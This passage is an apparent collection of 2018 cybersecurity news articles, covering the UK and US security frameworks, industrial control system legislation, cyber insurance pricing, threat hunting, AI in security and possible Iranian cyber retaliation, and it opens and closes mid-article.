Matt Walmsley, EMEA director at Vectra, notes the document is focused on the detection of known and common threats and attacks. "The really advanced attackers are well-resourced and highly motivated. They will use previously unseen innovative attacks that use both legitimate tools and zero-day vulnerabilities and exploits which will bypass traditional signature-based defense and detection approaches."

By definition, he suspects that government departments will be targets for advanced attackers. "Given the UK government departments are likely targets for cyber-espionage, and politically motivated hacktivists as well as broader cyber-attacks, it is vital that they have the ability to detect and respond to advanced hidden attackers in short order, and with high efficacy.”

Mark Adams, regional VP, UK&I at Veeam Software, believes it is a great start for government, but government needs to do more to sell the standard across private industry. "What hope does a minimum cyber security standard have of being adhered to, outside of the government departments where it is made mandatory? Precious little, unfortunately... more must be done by the UK government to educate the private sector and make it realize that data protection and more secure data management is a necessity."

U.S. security experts have been quick to see the parallels between the UK standard and NIST's Cybersecurity Framework. “If you look at the HMG Security Policy Framework (SPF), referenced by the Minimum Cyber Security Standard," Anupam Sahai, VP product management at Santa Clara, Calif-based Cavirin told SecurityWeek, "you’ll see that the overall structure is almost identical to the US NIST CSF -- and for good reason. The five primary functions – Identify, Protect, Detect, Respond, and Recover – are universal. Where the HMG SPF needs to go next is to map the high-level guidance to the more detailed UK-specific references, as they are mapped in the CSF. In parallel," he adds the UK has launched an Active Cyber Defense program, which in fact could serve as a template for the US.”

Lock also makes a comparison with the NIST framework. "The NIST Framework emphasizes the protection of data, provisioning access to a least-privilege “eyes-only” model, and continuous improvement among other key areas. And like the U.S. model, the Standard calls for continuous improvement, as organizations must be ready for the next attack.”

All told, the general consensus is favorable. The Minimum Security Standard is mandated for government, but also provides a valuable framework of private industry -- paralleling NIST in the U.S. Kolochenko sees even further value. "The UK," he said, "serves a laudable example on how cybersecurity can be and should be managed on a governmental level, that many other European countries can follow.”


House Passes Bill to Enhance Industrial Cybersecurity
27.6.2018 securityweek Cyber

The U.S. House of Representatives on Monday passed a bill aimed at protecting industrial control systems (ICS), particularly ones used in critical infrastructure, against cyberattacks.

The legislation, H.R. 5733, formally known as the “DHS Industrial Control Systems Capabilities Enhancement Act,” was introduced on May 9 by Rep. Don Bacon (R-NE) and it was approved by the House Committee on Homeland Security on June 6. The bill was announced a few weeks after the United States officially accused Russia of attempting to take control of critical infrastructure systems.

The new bill amends the Homeland Security Act of 2002 and requires the DHS’s National Cybersecurity and Communications Integration Center (NCCIC) to identify and mitigate threats and risks to ICS technologies and products used in critical infrastructure organizations.

House passes legislation aimed at strengthening industrial cybersecurity

The bill also requires NCCIC to maintain cross-sector incident response capabilities for ICS-related events, and provide technical assistance to end-users, product manufacturers, and other stakeholders in identifying and mitigating vulnerabilities in industrial control systems.

The agency is also required to provide the ICS community information on vulnerabilities based on collaboration with security researchers, manufacturers and industry end-users. The DHS will have to brief Congress every six months over the next four years.

The Congressional Budget Office (CBO) estimates that enacting this piece of legislation would cost less than $500,000 over the 2019-2023 period due to the fact that NCCIC already provides assistance to critical infrastructure operators and control system vendors, and the bill would only codify the agency’s responsibilities without imposing any new operating requirements.

“The next ‘Pearl Harbor attack’ will not be with missiles and torpedoes alone, but will be paired with attacks to our private sector functions needed to support our daily lives, such as our electric grid,” said Rep. Bacon. “DHS provides critical support to operators of industrial control systems (ICS), and my bill clarifies this responsibility so the Department can continue to identify and address threats to ICS in critical infrastructure. Any disruption or damage to critical infrastructure has the potential to cause catastrophic consequences to our nation’s public health and safety, economic security, and national security.”


EU States to Form 'Rapid Response' Cyber Force: Lithuania
26.6.2018 securityweek Cyber

Nine European Union states are to create rapid response teams to counter cyber attacks within the framework of a new EU defence pact, project leader Lithuania announced on Thursday.

"Nine states have agreed to join. The goal is to create rotational EU cyber rapid response teams," Defence Minister Raimundas Karoblis told AFP.

He said his counterparts from Croatia, Estonia, the Netherlands and Romania will join him on Monday to sign the agreement in Luxembourg while Finland, France, Poland and Spain will join later this year.

Teams formed by pooling experts on a rotational basis will be ready to help national authorities to tackle cyber attacks, with the schedule to be approved next year, Karoblis said.

The minister said he expected the EU to allocate funds for software and other equipment, adding that talks with EU institutions will continue about legal and technical aspects.

The cyber force will be among the first joint projects launched under a landmark EU defence pact signed last year.

The EU's move to establish the Permanent Structured Cooperation on security and defence, known as PESCO, was driven in part by US President Donald Trump's questioning of NATO's relevance and Britain's departure from the bloc.

Lithuania, a lead nation of the cyber defence project, has boosted its cyber capabilities in recent years to tackle what it describes as "hostile cyber activities" from nearby Russia, mostly targeting state institutions and the energy sector.


June 12 2018 Historic Edition of Cyber Defense eMagazine Has Arrived. Over 150 pages…
14.6.2018 securityaffairs  Cyber

June 12, 2018 – Cyber Defense eMagazine is arrived – OVER SIX THOUSAND PAGES – SIX YEARS – #1 GLOBAL SOURCE FOR CYBER DEFENSE
Cyber Defense eMagazine
June 2018 Edition has arrived.

We hope you enjoy this month’s edition…packed with over 150 pages of excellent content. InfoSec Knowledge is Power. We have 6 years of eMagazines online with timeless content. Visit our online library by clicking here. Please tell your friends to

subscribe – no strings, always free emagazines:

cyber defense emagazine

FLIPBOOK

http://www.cyberdefensemagazine.com/newsletters/june-2018/index.html

PDF

http://www.cyberdefensemagazine.com/newsletters/june-2018/CDM-CYBER-DEFENSE-eMAGAZINE-June-2018.pdf

MOBILE

http://www.cyberdefensemagazine.com/newsletters/june-2018/mobile/index.html

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1. USA 2018 Awards – CLOSED.

Congratulations to our InfoSec Awards 2018 Winners!

WANT TO SEE THE 200 INNOVATORS THAT MADE THE CUT THIS YEAR?

CLICK THIS LINK, HERE.

Our Global Awards are annually given out at the IPEXPO Conference as a global event in Europe every year, Q4. GLOBAL 2018 Awards – OPEN. Click here to apply.

MAGAZINES TV AWARDS and more platforms under development…

Sincerely,

TEAM CDM

Cyber Defense Magazine

P.S. Thanks to our awesome sponsors – media kits available here.

We are all things Cyber Defense. Thank you to our amazing readership!

Copyright (C) 2018, Cyber Defense Magazine, part of the Cyber Defense Media Group,

a d/b/a of STEVEN G. SAMUELS LLC CyberDefense.TV launching in 2H 2018

848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107. EIN: 454-18-8465, DUNS# 078358935.


AXA Partners With SecurityScorecard to Set Cyber Insurance Premiums
7.6.2018 securityweek Cyber

AXA Will Use Ratings From SecurityScorecard to Help Set Premiums for Insurance Agreements

Cyber insurance is a problem. It is a new industry with huge potential but great difficulties. Getting premiums right is an example -- the cyber insurer needs to fully understand the financial risk it incurs in able to set premiums high enough to cover the risk and still make a profit, but low enough not to kill the market.

Steve Durbin, managing director of the Information Security Forum, describes the problem. "We have already seen that the financial impact of some information security risks is being transferred through cyber insurance," he told SecurityWeek.

"However, moving forward, I anticipate that several large data breaches will expose aggregated risks and cause insurers to suffer significant financial losses. As a result of this mispricing debacle, several insurers will be forced out of business while others will raise premiums significantly, expand contract exclusions and restrictions, or avoid cyber insurance altogether. This will make cyber insurance no longer financially viable for many organizations, and the market will contract and take several years to recover."

Quite simply, data breaches are happening with increasing frequency (another 92 million passwords exposed by MyHeritage this week). At the same time, the cost of recovery continues to escalate rapidly, and the quantity and severity of cyber regulations, such as GDPR, is expanding.

The insurance industry traditionally relies on actuarial tables -- effectively a database of experience -- to set its premiums. While insurance companies are currently busy compiling such data on historical breaches, they have nothing like the depth of, for example, motor insurance actuarial tables.

"Currently, most policy premiums are based on self-assessments," comments Greg Reber, CEO at consulting firm AsTech. This leads to its own problems. False assessments, even unintentional errors, could lead to reduced payouts in extremis. It is a strange irony that the best premiums will only be obtainable by the organizations that least need to transfer their risk to the insurance industry. At the same time, any companies that seek to rely on insurance alone to handle their risk are likely to come unstuck.

SecurityScorecard and AXA (the world's largest insurance company) believe they have found a solution to the premium problem. SecurityScorecard is a firm that rates the cybersecurity posture of web-enabled firms. It does not wait to be asked -- and the result is a growing database of independent security ratings on the world's web-enabled businesses. Currently, it continuously monitors more than 200,000 businesses and gives them a security score from A to F. Empirical evidence suggests it works: "Companies that rate as a D or F are 5.4 times more likely to be breached than companies that rate as an A or a B," claims the company.

AXA has now entered an agreement with SecurityScorecard to have access to these ratings, and will use them to help set the premium for its insurance agreements. "The SecurityScorecard platform," explains Scott Sayce, global chief underwriting officer of cyber at AXA, "will help us rapidly evaluate companies to understand their cyberhealth and provide our underwriters with crucial information needed to evaluate an insured's risk.”

"AXA and SecurityScorecard are pioneering the cyber insurance industry,” adds Aleksandr Yampolskiy, CEO and co-founder at SecurityScorecard. This partnership demonstrates the value of the SecurityScorecard platform and the trust top business leaders have in our score. Our vision is to create a ubiquitous language for cybersecurity that facilitates collaboration and communication between business partners.”

Rather than relying on subjective, manual self-assessments from the customer, "They're going to be using the objective, automated, security metrics that we provide to make their insurance decisions," Yampolskiy told SecurityWeek. "They will feed that data into their algorithms and then decide, do I increase the premium because the customer's security posture looks risky, do I lower the premium, or maybe in some cases do I just flat out refuse to provide the cyber insurance?"

Our data, he continued, provides "objective measurements to create the scientific basis for making those insurance decisions. AXA plans to start underwriting thousands and thousands of European businesses." It is the small to medium sized business that most needs cyber insurance. "If you're an Equifax or a Target and you get hacked," continued Yampolskiy, "you might survive. But if you're a small company, you will not. So, AXA is planning to start using our technology to start making those cyber insurance policies that apply to thousands of those businesses," The advantage for those small businesses is they will be able to realistically set premiums, but will also learn their SecurityScorecard rating. "And that provides a lot of reciprocal benefit," he added.

Will this relationship be enough to kickstart a serious cyber insurance industry? It will probably happen anyway, but it may take time if left to its own devices. SecurityWeek asked Yampolskiy if cyber insurance might join the ranks of other insurances that are required by law.

"My belief is, yes," said Yampolskiy, "at some point in the future. We've reached the point where all companies are part of a larger interconnected ecosystem." He raised the example of Target, a large company breached through a small member of its supply chain. Target lost millions of dollars because of a smaller company, that would not of its own resources be able to provide recompense. "It's hard to predict the future," he said, "but I can see a time when all companies are required to have cyber insurance."

By providing a scientific basis for the insurance industry to use for premium-setting, Yampolskiy believes SecurityScorecard and AXA are moving the market toward the time when cyber insurance is not merely standard, but possibly required.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 in Series A funding led by Sequoia Capital in 2015; $20 million Series B in 2016; and $27.5 million Series C in 2017. Its stated mission is "to empower every organization with collaborative security intelligence."


How Threat Hunters Operate in Modern Security Environments
7.6.2018 securityaffairs Cyber

Cyber security – With millions of new malware surfacing on the internet every year, threat hunters need to be ever more ready and at the top of their game to ensure that their organization can remain safe and protected from all cyber threats.
Cyber security is a universe in its own. It’s got its own unique domains, and its fair share of challenges and that are faced every day by cyber security experts. Of late, a new terminology has surfaced on the internet; threat hunter. The role of a cyber-security hunter is becomingly rapidly and crucially important with each passing day.

cyber security

In 2017, the number of cyber-attacks that took place just across the US was almost 50% higher compared to the previous year. And this year is no different. According to a recent survey conducted by Crowd Research Partners, “the number of threats in the cyber space have continued to double each year“.

While millions of businesses are facing threats from cyber criminals, the wise ones are busy recruiting, training, and equipping their cyber security threat hunters with sophisticated tools and equipment required to fight the online malice.

Naturally, the ones who are uncertain about what a cyber-security threat hunter is supposed to do, are looking for avenues to get their hands on the skill. This article will help you get a basic understanding related to most aspects of threat hunters and how they work in modern security environments.

Job Description, Skills and Qualifications of a Threat Hunter
A Network threat hunter starts his research by assuming that the network has already been breached. This assumption is based on the fact that even though tools such as VPNs (recommended ones are PureVPN, PIA & Ivacy) and other server protections are in place, a breach has been made into the network which was sophisticated enough to bypass the VPN and other security measures.

A threat hunter needs to have a proactive approach while scanning all the networks and servers for possible breaches or intrusions. He also needs to be very creative in terms of understanding anomalies and slightly abnormal happenings or instances going on over a network.

When it comes to technical knowledge, threat hunters need to be at the top of their game in this forte. Only, when they understand the depths of how a network functions and how data flows through it, can they spot issues such as data being leaked or worse, getting hijacked by someone else.

Lastly, a network threat hunter needs to know the SOPs that are prescribed by the organization he is working at, along with the SOPs of the cyber security industry. Only when he knows in totally about the culture which is expected to be religiously followed, will he be able to create exceptions and detect threats which no eyes have ever seen before.

Understanding Dynamics of Modern Security Environments
Threats that the modern security environments face are evolving every day. It will be only logical to state that the tools and procedures in use today will soon become obsolete and get replaces with new tools and tech. Consequently, organizations that are concerned about keeping their networks and digital environments secure, need to be on the constant move toward adopting new tools and techniques.

This may not guarantee ultimate safety, but will definitely play a crucial role in keeping the organizations at least at par, if not a step ahead, with the growing threats in the online space.

How Threat Hunters Operate In Modern Security Environments?
In 2016, it was reported by G Data Software that 6.8 million new malware specimen surfaced on the internet. A year later, this number rose to 7.1 million. Looking at this trend, it is very clear that the coming years are going to be no easier on the threat hunters. In fact, it emphasizes on the importance of training threat hunters and preparing them for the most unexpected.

Of the 7.1 million new strains of malware that were discovered in 2017, obviously not all of them would be dangerous. However, identifying the few dangerous ones is what determines if a digital environment is secure or not. This is where threat hunters contribute for keeping the networks secure.

A threat hunter identifies threats which AI systems may have missed. They do so by focusing on the shortcomings of their organizational security architectures, which fail at preventing threats from gaining entry into the digital environment.

How to Conduct a Threat Hunt
Outsource or DIY
The first step to efficiently conduct an organization-wide threat hunt is to determine if it could to be carried out by the in-house security team. For such a case, it is important to allocate dedicated resources and equipment to the threat hunters.

If, for any reasons, the in-house team lacks the acumen for such a task, or if there are resource or time constraints that the security team is occupied with, the safer option is to outsource it.

Focus on Key Areas and Make a Plan
It is crucial to treat threat hunting as a pre-planned process, and not as an ad hoc task. Creating a proper plan and defining procedures that should be followed throughout the threat hunting process will play a crucial role in making the efforts bring a positive impact.

With a plan and a schedule in place, it could be made sure that tasks of the threat hunting team do not interfere with those of other teams. Furthermore, the schedule can also help in pre-determining the order of tasks that are to be executed. This will allow threat hunters to operate smoothly and effectively, while keeping track of all the tasks that have been accomplished and the ones that need attention.

Produce a Hypothesis
Beginning with the end in mind makes it easy to plot your journey and now for sure when a task is completed. When hunting threats, the team should determine what it is looking for and what it wants to find. For example, in this case, the threat hunters should determine beforehand that they are looking for malwares, or intruders who may have hacked the system.

Knowing what exactly to look for makes it easy to find it if it is there, or know when to stop the search in case there are no threats. If a hypothesis is not present, the search for threats may become endless and threat hunters will never be certain about when to stop.

Gather Crucial Information and Data
There is a lot to do when it comes to organizing all the available information and data. If the data is not organized, it is useless, as it becomes almost impossible to find what’s needed at the right moment. The data that threat hunters will collect and organize can include process names, command line files, DNS queries, destination IP addresses, digital signatures, etc.

If all this information is available but not sorted in a manner which is easy to sift through, threat hunters may take a lot of time for just finding the right information, and then additional time for utilizing the data for their processes. Such an approach can inflate budgets and resources used in threat hunting, damaging the overall productivity of the threat hunting team.

Task Automation
Without taking help of AI and automating tasks, it would be impossible to keep up with the ever-growing cyber threats. Even though a human eye is very much needed, without automation, the thousands of new threats and malware that surface on the internet every day, will go unnoticed.

For threat hunters, a combination of human resource which is exceptionally good at what they do is needed with artificial intelligence that has been built for precisely finding threats to modern security environments and sensitive networks.

Execution
That being said, there is no such thing as a perfect tool or a perfect procedure that a threat hunter can follow to eliminate threats from a modern security environment. It’s always a continues to struggle between competing with the online threats that keep getting better each day, and the innovation required by threat hunters to always stay one step ahead from the cyber-attacks.

AI and the Future of Cyber Threat Hunting
One of the most evolving tools in the recent times is artificial intelligence and machine learning, which has been helping threat hunters to reduce the amount of time they are spending on detention, prevention and fixing the issues. It also helps to improve the efficiency of the measures that the threat hunters take.
However, some people believe that as AI gets better, it will replace the need for having human threat hunters. We believe that will never be the case. This is due to two reasons.

Primarily, AI is a developing technology, which is available to both sides, the good and the evil. Moreover, some analysts even suggest that future cyber threats will be created and propagated using AI and even blockchain for creating a much wider impact.

Secondly, AI is a tool created by humans. Even though it is very efficient in terms of analyzing all options at the same time and taking the best decision, it may never be able to outpace the creativity and innovation that the human mind is capable of. AI may come in very handy for implementation and research purposes, but for now, the humans will lead the show with their own creativity and critical thinking.


The Current Limitations and Future Potential of AI in Cybersecurity
31.5.2018 securityweek  Cyber

A recent NIST study shows the current limitations and future potential of machine learning in cybersecurity.

Published Tuesday in the Proceedings of the National Academy of Sciences, the study focused on facial recognition and tested the accuracy of a group of 184 humans and the accuracy of four of the latest facial recognition algorithms. The humans comprised 87 trained professionals, 13 so-called 'super recognizers' (who simply have an exceptional natural ability), and a control group of 84 untrained individuals.

Reassuringly, the trained professionals performed significantly better than the untrained control groups. Surprisingly, however, neither human experts nor machine algorithms alone provided the most accurate results. The best performance came from combining a single expert with the best algorithm.

"Our data show that the best results come from a single facial examiner working with a single top-performing algorithm," commented NIST electronic engineer P. Jonathon Phillips. "While combining two human examiners does improve accuracy, it's not as good as combining one examiner and the best algorithm."

"The NIST study used a form of deep learning known as convolutional neural networks that has been proven effective for image recognition because it performs comparative analysis based on pixels rather than the entire image. This is like looking at the individual trees rather than the forest, to use a colloquialism," explains Chris Morales, head of security analytics at Vectra.

The question asked by the NIST researchers was how many humans or machines combined would lead to the lowest error rate of judgement when comparing two photos to determine if it they are of the same person -- with no errors being a perfect score. The outcome of their research was that combining man and machine produces a higher rate of accuracy for a single worker, which resulted in higher productivity. This result occurred because man and machine have different strengths and weaknesses that can be leveraged and mitigated by working together.

"What the researchers found," continued Morales, "was the best machine performed in the same range as the best humans. In addition, they found that combining a single facial examiner with machine learning yielded a perfect accuracy score of 1.0 (no errors). To achieve this same 1.0 accuracy level without machine learning required either four trained facial examiners or three super recognizers."

If these results are typical across the increasing use of artificial intelligence (AI) in cyber security -- and Morales believes the study is representative of the value of AI -- it implies we are rapidly approaching a tipping point. Right now, algorithms are not significantly better than trained professionals, but if used by a trained professional they can improve performance and reduce required manpower levels.

While AI itself is not new, it has grown dramatically in use and capability over just the last few years. "If we had done this study three years ago, the best computer algorithm's performance would have been comparable to an average untrained student," NIST's Phillips said. "Nowadays, state-of-the-art algorithms perform as well as a highly trained professional."

The implication is that we are not yet ready to rely solely on the decisions of machine learning algorithms, but that day is surely coming if algorithm quality continues to improve. We have, however, already reached the point where AI can decrease our reliance on human resources. The best results came not from team of experts combined with machine learning, but from a single professional working with the best algorithm.

"It is often the case that the optimum solution to a new problem is found with the combination of human and machine," comments Tim Sadler, CEO and co-founder of machine learning email security firm Tessian. "However, as more labelled data becomes available, and more researchers look into the problem, machine learning models generally become more accurate and autonomous reducing the need for a human 'operator'. A good example of this is medical imaging diagnosis where deep learning models now greatly outperform radiologists in the early diagnosis of cancerous tissues and will soon become the AI 'silver bullet'."

He doesn't believe that facial recognition algorithms have reached that stage yet.

"Facial recognition technology is fairly new, and although machine learning is quickly disrupting the industry clearly the technology is not perfect, for example there have been instances where facial recognition technology has authenticated through family likeness," Sadler said. "It will take years of close partnership between facial recognition experts are their machine learning counterparts working together, with the experts overriding the machine's mistakes and correctly labelling the data before a similar disruption is seen."

This NIST study is specifically about facial recognition -- but the basic principles are likely to be similar across all uses of machine learning in biometrics and cybersecurity. " First, the machine learning algorithm gathers facts about a situation through inputs and then compares this information to stored data and decides what the information signifies," explains Dr. Kevin Curran, senior IEEE member and professor of cybersecurity at Ulster University. "The computer runs through various possible actions and predicts which action will be most successful based on the collected information.

"AI is therefore increasingly playing a significant role in cybersecurity, especially as more challenges appear with authenticating users. However, these AI techniques must be adaptive and self-learning in complex and challenging scenarios where people have parts of their face obscured or the lighting is quite poor to preserve accuracy and a low false acceptance rate."

He cites the use of AI in Apple's Face ID. "Face ID works by projecting around 30,000 infrared dots on a face to produce a 3D mesh. This resultant facial recognition information is stored locally in a secure enclave on the new Apple A11 Bionic chip. The infra-red sensor on front is crucial for sensing depth. Earlier facial recognition features e.g. Samsung last year, were too easily fooled by face masks and 2D photos. Apple claim their Face ID will not succumb to these methods. However, some claim already that 3D printing someone's head may fool it, but we have yet to see that hack tested."

This NIST study was solely about the efficacy of facial recognition algorithms, and the results cannot be automatically applied to other machine learning algorithms. Nevertheless, the general conclusions are likely to apply across many other uses for AI in both physical security and cybersecurity. AI is improving rapidly. It cannot yet replace human expertise completely, but is most effective used in conjunction or by a single human expert. The implication is very clear: the correct combination of man and machine already has the potential to both improve performance and reduce payroll costs.


Attackers Hide in Plain Sight as Threat Hunting Lags: Report
23.5.2018 securityweek Cyber

CISO Survey Shows the Importance of Threat Hunting in the Finance Sector

The finance sector has one of the most robust cybersecurity postures in industry. It is heavily regulated, frequently attacked, and well-resourced -- but not immune to cybercriminals. Ninety percent of financial institutions were targeted by ransomware alone in the past 12 months.

Endpoint protection firm Carbon Black surveyed the CISOs of 40 major financial institutions during April 2018 to understand how the finance sector is attacked and what concerns its defenders. Two things most stand out: nearly half (44%) of financial institutions are concerned about the security posture of their technology service providers (TSPs -- the supply chain); and despite their resources, only 37% have established threat hunting teams.

Concern over the supply chain is not surprising. Cybercriminals are increasingly attacking third-parties (who may be less well-protected or have their own security issues) to gain access to the primary target. The Federal Deposit Insurance Corporation (FDIC) is also concerned about the supply chain, and has developed an examination process that includes reviewing public information about the TSPs and their software.

One of the areas that concerns the FDIC is consolidation within the service provider industry. "For example," it notes, "a flawed acquisition strategy may weaken the financial condition of the acquirer, or a poorly planned integration could heighten operational or security risk."

Carbon Black recommends that this potential risk be countered by hunt teams and defenders closely assessing their TSP security posture. But, it adds, "Given that 63% of financial institutions have yet to establish threat hunting teams, there should be concern regarding limited visibility into exposure created by TSPs."

But it also considers threat hunting to be important in detecting direct attacks. There are two primary reasons. The first is the increasing tendency for attackers to use fileless attacks that are not easily detected by standard technology; and the second is a growing willingness for attackers to engage in counter-countermeasures; that is, to counter the defender's incident response.

Fileless attacks are increasing across all industry sectors. A typical attack might involve a Flash vulnerability. Flash invokes PowerShell, feeding instructions via the command line. PowerShell then connects to a stealth C&C server, from where it downloads a more extensive PowerShell script that performs the attack. All of this is done in memory -- no malware file is downloaded and there is nothing for traditional technology defenses to detect.

"Active threat hunting," says Carbon Black, "puts defenders 'on the offensive' rather than simply reacting to the deluge of daily alerts." It "aims to find abnormal activity on servers and endpoints that may be signs of compromise, intrusion or exfiltration of data. Though the concept of threat hunting isn't new, for many organizations the very idea of threat hunting is."

But the need for threat hunting goes beyond simple detection of intrusion. "Attackers are able to go off their scripts while defenders are sticking to manual and automated playbooks," warns Carbon Black. "These playbooks are generally based off simple indicators of compromise (IoCs). As a result, security teams are often left thinking they have disrupted the attacker but, with counter incident response, attackers maintain the upper hand."

Compounding this, attackers are beginning to incorporate a secondary command and control in case one is discovered or disrupted. Carbon Black notes that this tactic has already been found in 10% of victims, and predicts it is a tactic that will grow in future months. The principal is that an attacker's ability to improvise and change directions at speed is best countered by a human defender rather than simply a pre-programmed set of incident response steps.

"Financial institutions," suggests Carbon Black, "should aim to improve situational awareness and visibility into the more advanced attacker movements post breach. This must be accompanied with a tactical paradigm shift from prevention to detection. The increasing attack surface, coupled with the utilization of advanced tactics, has allowed attackers to become invisible. Decreasing dwell time is the true return on investment for any cybersecurity program."

In reality, of course, this does not just apply to the finance sector. The same evolving methodology is being used by attackers across all industry sectors. The need for threat hunting is not limited to finance. "All sectors should take heed," Carbon Black chief cybersecurity officer Tom Kellerman told SecurityWeek. "Generally speaking, financial services tend to be the most secure as they've come under attack with high-profile attack campaigns in recent years." The implication is that if the finance sector is slow to switch to active threat hunting, other sectors will be slower.

In April 2018, Carbon Black filed an S-1 registration statement with the U.S. Securities and Exchange Commission (SEC) for a proposed initial public offering (IPO) of its common stock. Shares of the company (NASDAQ: CBLK) jumped 26% on its first day of trading on May 4. The company has a market capitalization of nearly $1.6 billion at the time of publishing. The company emerged in its current form after its purchase by Bit9 in February 2014.


U.S. Energy Department Unveils Multiyear Cybersecurity Plan
18.5.2018 securityweek  Cyber

The U.S. Department of Energy this week announced its strategy to reduce cyber risks in the energy sector and outlined its goals, objectives and activities for the next five years.

With the energy sector increasingly targeted by threat actors, the Energy Department is concerned that attackers may be able to cause a large and prolonged energy disruption. In an effort to improve the cybersecurity and resilience of energy services, the agency has created the DOE Multiyear Plan for Energy Sector Cybersecurity, which is meant to provide a foundation for the recently launched Office of Cybersecurity, Energy Security, and Emergency Response (CESER).US Energy Department announces multiyear plan for cybersecurity in the energy sector

The plan focuses on three main goals: strengthening cybersecurity preparedness, coordinating incident response and recovery, and accelerating research, development and demonstration (RD&D) for resilient energy delivery systems (EDS).

When it comes to strengthening preparedness, the DOE’s objectives include enhancing information sharing and situational awareness capabilities, strengthening risk management capabilities, reducing supply chain vulnerabilities, and developing and improving information sharing tools. This last objective includes the development of a virtual crowdsourced malware forensic analysis platform.

As for incident response and recovery, the Energy Department wants to establish a coordinated national incident response capability, conduct training for emergency responders and improve the incident reporting process, and conduct exercises.

The DOE’s third goal is to accelerate “game-changing RD&D” of resilient EDS, including for detecting, preventing and mitigating cyber incidents. The organization also wants tools and technologies that can anticipate future attack scenarios, and the development of systems and components that are cybersecurity-aware and capable of automatically handling cyberattacks.

“The DOE will be updating the Cybersecurity Capability Maturity Model (C2M2). The market has changed since it was published in February 2014,” commented Michael Magrath, director of global regulations & standards at VASCO Data Security. “We anticipate DOE will incorporate NIST’s Digital Identity Guidelines (SP 800-63-3), refreshed in 2017 and advance risk-based, biometric adaptive authentication technologies to protect the nation’s energy sector.”

“We welcome the DOE raising awareness around critical threats to the energy sector and laying out a strategy,” said Ray DeMeo, COO at Virsec. “While the strategy pillars are sound, making them actionable will be challenging - largely in view of the inertia behind legacy systems. It's critical that we invest with speed and agility, and the roadmap’s goal to accelerate game-changing RD&D of resilient systems stands out. The administration’s funding request for $96 million is hopefully just a down payment, because protecting our infrastructure adequately will cost billions.”


Security Gaps Remain as OT, IT Converge
16.5.2018 securityweek  Cyber

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high, and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not used privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

The security threat is not hypothetical. While there have already been severaal highly-publicized incidents (such as the Ukraine power outages in December 2015, and the U.S. water utility incident in March 2016) the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Industry Reactions to Iran Cyber Retaliation Over U.S. Nuclear Deal Exit
10.5.2018 securityweek Cyber

President Donald Trump announced this week that the U.S. is withdrawing from the Iran nuclear deal and reimposing sanctions on the Middle Eastern country. Many experts fear that Iran will retaliate by launching cyberattacks on Western organizations.

Industry professionals contacted by SecurityWeek all say that there is a strong possibility of attacks, but they mostly agree that Iran will likely not try to cause too much damage as that could lead to massive response from the United States and its allies.

And the feedback begins...

Ross Rustici, senior director, intelligence services, Cybereason:

“Iran is currently in a precarious position, any disproportionate retaliation risks alienating the European community that is currently aligned with continued sanctions relief in exchange for IAEA inspections. Compounding that with the fact the Iran's domestic situation has degraded over the last several years a result of its intervention in the broader Middle East and its proxy war with Saudi Arabia, leaves Iran's leadership needing to be very careful with how directly it confronts the United States on this issue.

In the near term Iran is most likely going to take a wait and see approach to the decertification of the deal by Trump. If sanctions are imposed on Iran and it serves to cause significant economic harm though rigorous enforcement, then Iran will probably seek to retaliate in a fashion similar to what the US experienced in 2013 with the DDoS attacks against the financial sector. Despite the Iranian cyber program maturing significantly in the past five years, they will focus on a proportional response to whatever sanctions regime is levied against them. Disruptions that cause financial loss rather that destruction is where the regime is likely to go first. Iran is only likely to use significant destructive capabilities if the situation escalates or the US expands its role in supporting Saudi Arabia.

